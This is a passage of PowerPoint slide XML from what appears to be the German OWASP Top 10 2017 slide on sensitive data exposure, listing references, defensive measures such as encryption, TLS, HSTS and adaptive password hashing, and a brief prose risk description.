                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Prot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t> (V9)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> und </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>SSL/TLS (V10)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>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a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Referenzen</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de-DE" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId5"/>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6"/>
              </a:rPr>
              <a:t>OWASP Proactive Controls: Protect Data</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Application Security Verification Standard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> (V7,9,10)</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE"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7"/>
              </a:rPr>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>Cheat Sheet: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>Transport Layer Protection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8"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet: User Privacy Protection</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9"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheets: Password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> und </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>Cryptographic Storage</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1"/>
              </a:rPr>
              <a:t>OWASP Security Headers Project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2"/>
              </a:rPr>
              <a:t>Cheat Sheet: HSTS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3"/>
              </a:rPr>
              <a:t>OWASP Testing Guide: Testing for weak cryptography</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" u="sng"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err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Andere</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId14"/>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5"/>
              </a:rPr>
              <a:t>CWE-202: Exposure of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="sng" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>sens.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t> information through data queries</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId16"/>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6"/>
              </a:rPr>
              <a:t>CWE-310: Cryptographic Issues</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17"/>
              </a:rPr>
              <a:t>CWE-311: Missing Encryption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8"/>
              </a:rPr>
              <a:t>CWE-312: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="sng" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t>Cleartext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t> Storage of Sensitive Information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9"/>
              </a:rPr>
              <a:t>CWE-319: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="sng" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId19"/>
              </a:rPr>
              <a:t>Cleartext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId19"/>
              </a:rPr>
              <a:t> Transmission of Sensitive Information</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0"/>
              </a:rPr>
              <a:t>CWE-326: Weak Encryption</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21"/>
              </a:rPr>
              <a:t>CWE-327: Broken/Risky Crypto</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2"/>
              </a:rPr>
              <a:t>CWE-359: Exposure of Private Information (Privacy Violation)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hlinkClick r:id="rId23"/>
              </a:rPr>
              <a:t>BSI TR-02102 Kryptographische Verfahren:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId23"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId23"/>
              </a:rPr>
              <a:t>Empfehlungen und Schlüssellängen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Wie kann ich das verhindern?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Für alle vertraulichen Daten sollten Sie zumindest:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-8255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Legen Sie den Schutzbedarf der verarbeiteten, gespeicherten und übertragenen Daten gemäß Klassen fest. Berücksichtigen Sie dabei auch Datenschutzgesetze, regulatorische und Geschäfts-Anforderungen.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-8255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Legen Sie Maßnahmen je Klasse fest.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-8255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Kein unnötiges Speichern vertraulicher Daten. Sofortiges Löschen nicht mehr benötigter Daten oder PCI-DSS-konformes Speichern von Ersatzwerten (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Tokenisierung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) oder gar gekürzten (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>trunkierten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) Werten. Daten, die es nicht gibt, können auch nicht gestohlen werden.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-8255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Verschlüsseltes Speichern von sensitiven Daten.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-8255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Aktuelle, starke Algorithmen und Schlüssel (z.B. gemäß BSI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId23"/>
              </a:rPr>
              <a:t>TR-02102</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) u. wirksames Schlüsselmanagement </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>verwenden.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-8255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Nutzen von Transportverschlüsselung mit sicheren Protokollen, wie z.B. TLS mit priorisierten </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ciphern</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, die ausschließlich </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Perfect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Forward Secrecy (PFS) und sichere Parameter nutzen.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Konfigurieren von Anweisungen wie z.B. HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Strict</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Transport Security (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>HSTS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) zum obligatorischen Verschlüsseln.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-8255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Deaktivieren des Caches für den Empfang sensibler Daten.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-8255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Passwörter mit einem speziellen, adaptiven </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Salting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-Hash-Algorithmus mit hohem Rechenaufwand (=Verzögerung) speichern (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId24"/>
              </a:rPr>
              <a:t>Argon2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId25"/>
              </a:rPr>
              <a:t>scrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId26"/>
              </a:rPr>
              <a:t>bcrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> oder </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId27"/>
              </a:rPr>
              <a:t>PBKDF2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE"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Unabhängige Überprüfung der Wirksamkeit der Einstellungen.</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A3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1400"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>:2017</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Verlust der Vertraulichkeit sensibler Daten</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3583286812"/>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lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:endParaRPr lang="de-DE" sz="1100" b="1" noProof="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de-DE" sz="900" b="1" noProof="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Ausnutzbarkeit:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="500" b="1" noProof="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1050" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="0" noProof="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de-DE" sz="1050" b="1" noProof="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de-DE" sz="1000" b="1" baseline="0" noProof="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Verbreitung: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1050" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="0" noProof="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:sym typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
                        </a:rPr>
                        <a:t>3</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="1050" b="0" baseline="0" noProof="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de-DE" sz="1000" b="1" noProof="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Auffindbarkeit: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1050" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="0" noProof="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de-DE" sz="1050" b="0" kern="1200" baseline="0" noProof="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de-DE" sz="1000" b="1" baseline="0" noProof="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Technisch: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1050" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="0" noProof="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de-DE" sz="1050" b="0" baseline="0" noProof="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endParaRPr lang="en-US" sz="1100" b="1">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de-DE" sz="900" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Angreifer brechen i.d.R. nicht die</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="de-DE" sz="900" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Verschlüsselung selbst. Stattdessen stehlen sie Schlüssel, führen manuell Seiten- oder MITM-Angriffe aus bzw. stehlen Klartext vom Server, während der Übertragung oder aus dem Browser des Benutzers. Bereits zuvor entwendete Passwort-Datenbanken können mithilfe von Grafikkarten per </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" noProof="0" dirty="0" err="1">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Brute</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
